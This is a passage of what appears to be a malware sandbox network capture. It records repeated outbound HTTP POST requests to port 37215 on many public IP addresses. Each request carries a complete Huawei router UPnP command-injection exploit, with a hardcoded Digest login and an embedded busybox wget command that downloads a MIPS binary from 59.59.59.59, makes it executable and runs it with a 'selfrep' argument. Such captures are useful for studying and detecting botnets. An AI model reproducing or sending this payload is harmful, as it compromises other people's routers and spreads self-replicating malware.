                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          522192.168.2.1541100157.32.233.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.616342068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          523192.168.2.1558334157.151.111.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.616467953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          524192.168.2.1538804157.183.236.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617432117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          525192.168.2.1544106157.160.189.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617444038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          526192.168.2.1555706197.92.164.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617468119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          527192.168.2.1541162197.243.88.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617616892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          528192.168.2.1541934157.33.32.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617665052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          529192.168.2.153413641.178.143.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.617964029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          530192.168.2.1538724186.48.76.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.618078947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          531192.168.2.1535966157.153.105.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.618356943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
